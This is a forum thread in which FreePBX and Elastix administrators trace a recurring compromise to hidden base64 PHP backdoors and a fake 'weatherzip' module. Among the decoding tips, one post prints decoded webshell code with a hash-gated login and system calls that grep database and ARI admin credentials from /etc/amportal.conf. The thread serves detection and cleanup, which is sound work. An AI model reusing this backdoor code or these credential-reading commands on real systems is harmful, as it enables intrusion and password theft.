I’ve been hacked! Macro [thanku-outcall]; thankuohoh

We found a file called config.php in admin/libraries/php-upgrade/ext

The file is base64 encoded and not on any other installation we have done. The file allows a remote user to post commands that execute as system calls.

The file contains this:


It also does this:

grep AMPDB /etc/amportal.conf
grep ARI_ADMIN /etc/amportal.conf

to get your database info and passwords and your ARI admin user and password…


What is this, the distro or something else and what version is this running and what was it initially set up as?

Good luck and have a nice day!


This was on Freepbx Distro, that had probably been compromised when it had fw_ari. It was running freepbx 2.11.

Sure enough… we could not find where they were getting in again and again.
We have our systems patched and updated, yet this kept occurring.

Under /var/www/html/admin/libraries/php-upgrade/ext we found the config.php file noted above.
Only the systems were this was occurring had this extra file.

The file has been deleted, so hopefully there are no other files placed in the system.

Sadly, this has not resolved the issue.
There must be another file they are getting in from.

Any ideas anyone?

In addition to /var/www/html/admin/libraries/php-upgrade/ext/config.php

do an ls -a
You may also find a hidden file at:/var/www/html/.header.php
and may also find a hidden file at:/var/www/html/.marvels.php

This hidden header.php and marvels.php files contain the same base64 exploit as noted above.

Sorry to ask but would it be too painful to just start over with a fresh (not compromised) system and configure it as the old one? Because it sounds like you are playing “whack a mole” game on your old system. You can never know how many other back doors left by the attacker you have not yet discovered.

Hi dziny,

Yes… we are simply sharing our findings for others that may not have an option to rebuilt at all (or right away).

Another piece to the puzzle.
Check for /var/www/html/admin/modules/weatherzip
It will probably show up in your module list but as not installed. It’s a front for something else.

Open http://[IP]/admin/modules/weatherzip in browser and you get form with text input and Marvels button.
The index.php is webadmin.php with the code check at the beginning. The code check compares the input to an md5 hash. I don’t know what the secret code is but I put in my own hash and logged in and found that you have access to webadmin.php.

https://gist.github.com/nic-o/1219610 I assume the code check at the beginning is to keep others out. Yes, with webadmin.php you can upload and view files, etc., as long as the web server has the proper permissions to the selected file/folder.

Thank you Noel
Sure enough, that was there… and showing as not installed in module list.
Now that it has been removed… hopefully this kills them for good.

I am rebuilding all servers, but it takes time to test and migrate… especially with the massive changes in v13 (from v11).

Hi, Please how was the decoding here done?. Found a similar file after getting multiple calls passing through my server (Using Elastix - Basically FreePBX with a diff gui) got the same gibberish in the file after tracking it down (thanks for the tips). PS. Also trying to add forcing the Callers IP into the CDR’s because it seems to be sending calls out as Local/[email protected];2 so would like to see if I can add some more blocked IP’s to my firewall.


In the case of the code that was posted, it was base 64 encoded…

You need to use a base 64 decoder, the easiest way is to use one of the online ones like this one:


They did make it a pain to know what to paste though by putting comments with base 64 like garbage in them…

Again, in the case of the code that was posted what to paste into the base 64 decoder started with “LypZUjc5REppblR” and ended with “cDlCNFgqLwo=” (the “=” is a padding character in base 64, when you see them these are the last characters of the base 64 encoded string)…

I guess in an effort to confuse people further the decoded base 64 output of the code that was posted has comments which look like base 64 themselves but are, as far as I know, just garbage…

Good luck and have a nice day!


WOW!! Thanks… Another thing to learn! This is what I got tho:
if (isset($_REQUEST[‘p’]) && md5($_REQUEST[‘p’]) == ‘c597a14b4ee503f6b9257c4e52528d44’) {
$_SESSION[‘zoz’] = ‘logged’;
if (!isset($_SESSION[‘zoz’])) {
echo ‘’;
if (isset($_SESSION[‘zoz’]) && $_SESSION[‘zoz’] == ‘logged’ && !isset($_REQUEST[‘silent’])) {
echo ‘’;
echo “”;
@system(“grep AMPDB /etc/amportal.conf”);
echo “---------------------\n”;
@system(“grep ARI_ADMIN /etc/amportal.conf”);
echo “---------------------\n”;
echo “”;
echo “”;
echo “”;


Seems like the same exploit, more or less…

There are some parts missing compared to what was posted earlier (it is supposed to contains an HTML form) but they were quite likely removed by the forum software…

I am no PHP guru but amongst other things they are getting your database info and passwords and your ARI admin user and password…

What version of FreePBX are you using and is it the distro?

Good luck and have a nice day!


You can try to run Linux Malware Detect (Maldet) on your system to see if it detects the files (and anything else).

There are also lots of “commercial” Linux-based malware scanners out there. IIRC, Sophos (or maybe AVG?) has one that will even do root-kit scanning.